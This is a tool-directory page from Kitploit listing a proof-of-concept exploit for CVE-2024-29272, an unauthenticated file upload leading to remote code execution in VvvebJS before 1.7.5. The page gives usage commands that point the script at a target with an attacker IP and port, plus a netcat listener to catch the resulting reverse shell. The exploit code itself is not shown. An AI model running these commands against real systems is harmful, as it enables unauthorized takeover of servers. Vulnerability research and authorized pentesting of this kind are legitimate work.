Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/awjkjflkwlekfdjs/cve-2024-29272
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingPayload Development
GitHubawjkjflkwlekfdjs/cve-2024-29272

CVE-2024-29272

Proof-of-concept exploit for CVE-2024-29272, an unauthenticated arbitrary file upload vulnerability in VvvebJS < 1.7.5, enabling remote code execution.

View Repository
2 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2024-29272

This is a Proof-of-Concept for CVE-2024-29272, an unauthenticated arbritrary file upload vulnerability that leads to remote code execution on versions of VvvebJS < 1.7.5

usage:

root@kitploit:~
python3 poc.py -u <URL> -l <ATTACKER IP> -p <ATTACKER PORT>

in another terminal:

root@kitploit:~
nc -lvnp <ATTACKER PORT>
Download Tool